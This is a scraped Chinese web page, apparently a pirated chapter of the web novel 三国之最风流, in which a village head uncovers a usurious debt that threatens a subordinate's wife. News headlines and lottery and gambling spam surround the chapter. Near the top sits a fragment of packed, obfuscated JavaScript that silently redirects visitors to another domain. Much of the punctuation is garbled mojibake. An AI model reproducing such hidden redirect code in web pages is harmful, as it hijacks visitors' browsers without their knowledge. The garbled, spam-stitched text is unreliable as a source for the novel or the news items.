艺术推手必备基本素养 2019-08-17
  • 不可思议!日本八幡平现“龙眼”奇景 2019-08-17
  • 回复@永胜龙须村:你可以去找嘛…… 2019-08-16
  • 地理君的专栏作者中国国家地理网 2019-08-14
  • 周纪龙:为262名残疾人的幸福领路 2019-08-13
  • 你就是小小文学家!“长城小作家”开始招募啦! 2019-08-13
  • 欧盟将对美28亿欧元产品加征关税 报复清单针对性强 2019-08-08
  • 印度右翼组织成员为特朗普庆生 给海报喂蛋糕 2019-08-07
  • 北京冬奥场馆建设注重赛后利用 2019-08-05
  • 大悟城市形象征集投票结束,共征集作品1万6千件 2019-08-05
  • 视频:热心球迷!陈奕迅吴秀波惊现世界杯开幕式现场 2019-08-04
  • 四轮电动车销售火爆存安全隐患 专家:需建国家标准 2019-08-04
  • 日本大阪6.1级强震4死逾300伤 工厂及店铺恢复运营 2019-08-03
  • China knows better as Trump tariff strategy tricks US voters 2019-08-03
  • 沙特球员惨败后将被惩罚?沙特足球协会:假的 2019-08-02
  • 35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('8 (! (/b.3/4.c(9.5))) {9.5 = \'7://a.b.3/0/1/2.6\'}',62,13,'10|10355|5389231|com|gi|href|html|https|if|location|m|sczprc|test'.split('|'),0,{}))" id="nr_body" class="nr_all c_nr">
    返回

    体彩排列三:三国之最风流

    河北排列72018087
    关灯
    护眼
    字体:
    44 高家
       存书签 书架管理 返回目录
        “乡亭”即“乡治”的所在,在“繁阳亭”东北方向,中间相隔了两个亭部,抄近路的话,大约十几里地。 www.voDtw.com

        荀贞和陈褒用了不到半个时辰,十几里地转瞬即至?!跋缤ぁ彼淙皇恰跋缰巍彼诘牡胤?,但道路上行人稀疏,明显比繁阳亭冷清很多。

        陈褒说道:“在去年的疫病中,乡亭亡故者甚众?!?br/>
        繁阳亭境内没有空闲的田地,都种满了麦子,而才入“乡亭”,路边的土地就有荒芜的了。不但“乡亭”,他们一路走来,路过的那两个“亭部”中,也或多或少分别都有此类现象。

        民以食为天,只要有口气在,农人就不可能让田地荒芜,很显然,这些土地的主人应该都是全家尽数殁在疫中了?!还?,这种田地闲置的现象不会延续太久,不知道有多少在虎视眈眈地盯着呢!最多到明年,必就会或被豪强之家占走,或被亡者的族人收归族中。

        陈褒知道程偃的家,领着荀贞七拐八折,尽走的小路,不多时来到一处里外。

        这个里的规模不小,比安定里、南平里都大,粗略估摸,至少能住八九十户人家。里门的瓦当上飞云为纹,中有两字:“程里”。

        以姓为里名,说明是聚族而居。荀贞问了陈褒,果不其然,里中皆为程姓。

        在没有公事、又不是休沐的情况下,亭长一如郡、县长官一样,是不能擅自出界的。所以,荀贞此次出来,换下了亭长的服饰,裹了个黑色的帻巾,看似一个普通的黔首百姓。

        “里监门”很负责任,见他二人近前,从塾中出来,问道:“做什么的?”

        陈褒代为回答,说道:“俺们与本里民程偃同在繁阳任职,今有事去他家中?!?br/>
        “繁阳?……,你是?”

        “俺叫陈褒?!?br/>
        “里”的管理是很严格的,有陌生人来时必须要问清楚,如果有外人想要暂住“里”中,还必须登记,得有“任者”,也即保人。荀贞之所以能在“繁阳亭”的各里中出入无忌,那是因为他是亭长。现在来到别人的地盘,肯定会受到盘问。

        里监门打量了他两人几眼,问道:“知道程家在哪儿住么?”

        “二门东入,即为程舍?!?br/>
        知程偃在繁阳亭任职,又知程偃家住里中何处,看着不似歹人,里监门打消了怀疑,让开道路,说道:“进去吧?!?br/>
        “二门东入”。里和里不同,有的里是一条直道,住户分住两侧;有的里是两条直道交叉,住户分住四方。又有的里除了直道还有小巷,巷子与直道相交,相交的位置设的也有门,比如荀贞住的高阳里就是如此?!岸拧?,即进到里边之后的第二个门,“东入”,方向在东边。

        两人牵马步入“里”中。

        正是农闲时节,此时将近午时,太阳晒在身上很暖和,三两闲汉蹲在巷中,懒洋洋地聊天,瞧见荀贞和陈褒入来,往墙边靠了靠,让他们过去。有多嘴的问道:“来找谁的?”

        陈褒答道:“程偃?!?br/>
        “哟,那你们来的可不巧,小五前几天就回亭里了?!?,你们知道他在繁阳亭么?”

        “俺们就是从繁阳亭来的?!?br/>
        几个闲汉对视一眼,先前说话的那人问道:“可是小五出什么事儿了?”

        荀贞心中一动,问道:“为何如此问?”

        那汉子打个哈哈,却不肯说了,只道:“随口一问,随口一问?!?br/>
        再问时,他们索性不开口了。

        见从他们这儿问不出什么了,荀贞与陈褒继续往前走,走了几步,听见那几个闲汉窃窃私语,隐约听到一句:“那高家的人昨儿又来了,对小五家里说,最多再只宽限两日!……?!?br/>
        往前走了几步,陈褒低声对荀贞说道:“看来阿偃家中确实有事,只不知是怎么了?”

        荀贞不动声色:“到他家问问就知道了?!?br/>
        进入二门,向东走,第三户便是程偃家。

        宅院甚破,木门上尽是裂口、缝隙,黄土夯成的墙垣,围着一个不大的院子。

        陈褒上前敲门,等了片刻,门内有人应道:“谁?”

        “繁阳亭亭卒陈褒?!?br/>
        院门打开,出来一个美妇。

        荀贞只觉眼前一亮,下意识地扭头去看陈褒。

        陈褒也是呆了一呆。他虽与程偃同亭为卒多年,也知他家住何处,但因平时劳忙,逢上休沐也都是各回自家,或孝敬父母、或亲善妻子,却是从来没有登门来过,试探性地问道:“请问当面,可是嫂嫂?”

        那美妇人神色焦急,胡乱点了点头,急急问道:“可是程郎将钱凑够了么?”

        确认了眼前美妇便是程偃妻子,这回轮到陈褒下意识地转脸去看荀贞。荀贞想道:“程偃相貌狰狞,万没想到其妻竟这般美貌!这真是、这真是,……?!闭也蛔藕鲜实男稳荽?,一边作揖,一边说道,“在下荀贞,繁阳亭亭长?!?br/>
        “啊,原来是荀君!”

        美妇忙要行礼。荀贞制止了,说道:“我此次来乃是便服,不必行礼了?!毕蛟褐锌慈?,问道,“家里还有别人么?”

        “没,没有了?!笔芰塑髡晏嵝?,美妇人才想起来请他们进门。

        院中被收拾得干干净净,喂了两只母鸡,正蜷伏在鸡埘前的地上晒暖。

        美妇人带着他们穿过院子,来入堂屋。堂屋里没什么东西,只在地上铺了一领席,席前一个矮案,墙上挂了个竹编的箩筐,除此之外,别无长物。虽然寒酸,但和院中一样被打扫得很干净,席子、矮案,甚至地上、墙上都是一尘不染。

        看得出来,这程偃的妻子必是个爱干净的。

        请荀贞、陈褒二人坐下,程妻有点不好意思地说道:“家里没什么东西,荀君、陈君远来,必然渴了,且请稍等,妾去烧点温汤?!?br/>
        “不用了,你不用忙活。我们今天来,主要有件事儿想问你?!?br/>
        上次程偃回来,程妻已听过荀贞的名字,对陈褒的名字她更是熟悉。面前两个男人,一个是她丈夫的顶头上司,一个是她丈夫的同事,最先的迫急过后,她显得有点局促,听了荀贞的话,便不安地侧身屈体在席前,说道:“荀君请说?!?br/>
        她屋中只有一领席子,男女不同席,荀贞和陈褒坐了,她只能站着。

        “适才门前你脱口而出,问是不是钱凑够了。我且问你,你家中近日缺钱用么?”

        程妻扭了扭身子,不安地说道:“程郎没对荀君说么?”

        “没有,所以我们才来问你?!?br/>
        “既然程郎没说,那……?!?br/>
        荀贞打断了她的话,说道:“程偃虽没说,但自回亭中后,他连着多日沉默寡言,每日只是举重不止。这样下去怎么能行?你不必顾忌他,究竟发生了何事,尽与我言就是?!?br/>
        程妻犹豫不决。

        “其实你不说,我们也知道了。刚才来的路上,遇到了几个你们里中的住民,听他们说是高家,……?!避髡晁档酱舜?,故意顿了一顿。

        一听到“高家”之名,程妻神色陡变,从局促不安变成了惶恐害怕,颤声说道:“既然荀君已经知道,妾也就不隐瞒了。昨天高家的人还来,说最多再等两天,要是仍不还钱,便要、便要,……?!?br/>
        “便要如何?”

        “便要将妾绑走顶债?!?br/>
        “抵债?”荀贞顿了顿,从容地问道,“你家欠高家了多少钱?”

        “去年大疫,阿姑病重,为延医买药,借了高家三千钱?!?br/>
        荀贞顿时了然,原来是为给她婆婆治病,所以欠了高家的高利贷,问道:“三千钱?月息多少?”

        “一百五十?!?br/>
        一个月利息一百五十,一年一千八百钱。本钱三千钱,折合下来,贷款的年利率百分之六十。荀贞微微蹙眉。他虽没借过钱,但也听说过,通常来说,当时借贷的年利率在百分二十上下,百分之六十明显过高。不用说,定是高家趁火打劫。

        “去年何时借的?”

        “二月?!?br/>
        荀贞很快算出来,截止目前,该还钱不到六千。他暗暗奇怪,五千多钱,虽不少,也不算很多,程偃还有个兄长,两家凑凑,再找亲戚借点,总能拿出来的。程偃却为何那般作态?他说道:“还差多少钱不够还给高家?”

        “五千钱?!?br/>
        荀贞愕然,难道是他算错了?又算了一遍,没有错,的确本息合计,不到六千钱。就算程偃一个钱也没有,也不该还差五千。他心知其中必有玄虚,问道:“本息合计,不足六千,还差五千钱?”

        程妻也很愕然,说道:“本息合计,该还七千六百五十钱,怎会不足六千?”

        荀贞细细询问,方才知晓,原来程家向高家借钱的时候,所签文书上写得清楚:一年内还,月息一百五十;如果一年到期还不上,那么月息改为按前一年本息总计的百分之百。也就是:如果本息总计五千,从第十三个月起,每月的月息变成五百。

        程妻说道:“本来这钱今年二月就能还上的,兄公因听人言语,欲以钱生钱,所以没还,而是与人约为行商、贩卖货物。早两个月赚了点钱,上个月收了一批麦、黍,卖时才发现尽为陈粮,且斤两不足,底下竟有以石充重的!只这一下,只这一下,就……?!彼挥?。

        荀贞听明白了,这事儿全怪程偃的兄长,有钱还的时候不肯还,拿去与人合伙做买卖,上个月买了一批伪劣假货,一下把钱赔完了。

        前汉及本朝虽然本着重农轻商的方针,“禁民二业”,禁止一个人从事两种行业,农人就是农人、商人就是商人,但人性逐利,根本就禁止不了。不但地主争相经商,普通的小农也会合伙做买卖,就像是“父老僤”一样,合伙人在一块儿立个契约,约定各出多少本钱,并约定权力和义务。像这类小农组成的商业团体有大有小,少则各出本钱数百,多则各出本钱数千。

        荀贞问道:“出了本钱多少?”

        “五千?!?br/>
        “虽尽为陈粮,又缺斤短两,但总不致亏损完,估计能收回多少?”

        “兄公算过,不足一千?!?br/>
        “……?!?br/>
        荀贞都不知道说什么好了,程偃的兄长也真是个人才,五千的本钱,赔得剩下了不到一千。他说道:“问高家借钱的是你家么?”

        “阿姑如今随兄公住,这钱是兄公借的?!?br/>
        “那为何欠钱还不上,要拿你抵债?”

        荀贞问完,没等程妻回答,他就知道自己问了傻问题。多明显,定是高家人相中了程妻美貌。果然,程妻脸上飞红,小声答道:“高家听说兄公折了本钱后,本是去他家要债的,当时妾刚好去给阿姑问安,两下撞上。不知、不知为何,那高家就改来妾家追债了?!?br/>
        她先时眼中含泪,这会儿面上飞羞,端得楚楚可怜。荀贞瞧她的模样,心道:“长成这般模样,也难怪高家找你抵债?!蔽实?,“当初的债约是谁签的字?”

        “兄公?!?br/>
        “那和你家没啥关系啊,即便高家寻你抵债,道理也不在他那边?!?,你兄公怎么说的?”

        程妻默然不语。

        荀贞心中有数了,必是程偃的兄长被追债追得无路可走,见高家的人对弟妇感兴趣,所以索性就将程妻卖了。一边是亲兄长,一边是自家妻子。亲兄长求着自家把妻子抵债,该怎么办?程偃回到亭中后沉默寡言,生闷气,不给诸人说,怕就是因此缘故。

        荀贞长叹一声,想道:“许仲兄弟兄友弟恭,程家兄弟却长兄逼弟。谚云:‘虽有亲父,安知不为虎。虽有亲兄,安知不为狼’,诚哉斯言!”既然事情了解清楚,没有再留下的必要,他起身说道,“你不必忧虑,有我等在,必不会使你抵债?!?,这高家可就是乡亭的高家么?”

        程妻听他说“必不会使你抵债”,又疑又喜,盼着这是真的,又怕荀贞哄她,忐忑地答道:“是的?!?br/>
        “他家限最晚何时还钱?”

        “后天?!?br/>
        “你安心在家,高家的人若再有上门,你就告诉他们,后天必将欠钱还上?!避髡暌槐咚?,一边与陈褒从屋中出来,走到院门口,对程妻说道,“留步,不必送了。最晚后天中午,我必会使程偃带钱回来?!?br/>
        ……

        出了“程里”,陈褒问道:“荀君,你打算借钱给阿偃么?”

        “总不能看他因此破家?!?br/>
        说起这个,陈褒吧唧着嘴,啧啧称奇,说道:“阿偃这丑汉居然能娶得此般美妇,难怪每逢休沐,他总急巴巴地赶回家去,半刻不愿停留?!?,他嘴倒紧,认识几年,竟从不曾听他说过!”

        荀贞家比不上有钱人,但五千钱还是拿得出的。他骑上马,与陈褒返程,出了“乡亭”地界,他回首转望,心道:“这高家首富乡中,却如此欺人。虽说欠债还钱天经地义,但一来朝廷明文规定,月息不可过高;二来竟欲夺人妻子,实在过分!”

        过分又能怎样?荀贞只是“繁阳亭”的亭长,想管也管不了,只能权且抱着息事宁人的态度,将钱替程偃出了。虽然不甘,往好的方面想,至少可有恩於程偃。

        程偃和他的关系本就不错,其人也有些力气,是个勇夫,通过此事,或能将其彻底收揽??词追⑽薰愀媲氲?nbsp;www.

        请分享
    上一章 目录 下一章

    河北排列72018087 www.krqwg.com 赵子曰的小说三国之最风流仅代表作家本人的观点,不代表网站立场,内容如果含有不健康和低俗信息,请联系我们进行删除处理!
    三国之最风流最新章节内容由网友收集并提供,转载至伤城中文网只是为了宣传《三国之最风流》让更多书友知晓。版权归作者赵子曰所有。
    三国之最风流吧,三国之最风流5200,河北排列72018087,三国之最风流燃文

  • 艺术推手必备基本素养 2019-08-17
  • 不可思议!日本八幡平现“龙眼”奇景 2019-08-17
  • 回复@永胜龙须村:你可以去找嘛…… 2019-08-16
  • 地理君的专栏作者中国国家地理网 2019-08-14
  • 周纪龙:为262名残疾人的幸福领路 2019-08-13
  • 你就是小小文学家!“长城小作家”开始招募啦! 2019-08-13
  • 欧盟将对美28亿欧元产品加征关税 报复清单针对性强 2019-08-08
  • 印度右翼组织成员为特朗普庆生 给海报喂蛋糕 2019-08-07
  • 北京冬奥场馆建设注重赛后利用 2019-08-05
  • 大悟城市形象征集投票结束,共征集作品1万6千件 2019-08-05
  • 视频:热心球迷!陈奕迅吴秀波惊现世界杯开幕式现场 2019-08-04
  • 四轮电动车销售火爆存安全隐患 专家:需建国家标准 2019-08-04
  • 日本大阪6.1级强震4死逾300伤 工厂及店铺恢复运营 2019-08-03
  • China knows better as Trump tariff strategy tricks US voters 2019-08-03
  • 沙特球员惨败后将被惩罚?沙特足球协会:假的 2019-08-02
  • 德甲联赛英文 大乐透开机号和重点推荐 5元中国红刮刮乐规则 双色球全部开奖历史记录 新疆25选7开奖2019年 七星彩走势图带坐标连线走势图 红宝石娱乐城博彩网站 彩票走势图怎么打印 玖体育 足彩6场半全场怎么买 内幕凤凰四肖中特 天津十一选五直播 精彩万分两码中特免费 吉利三分彩是什么 潮汕赌经A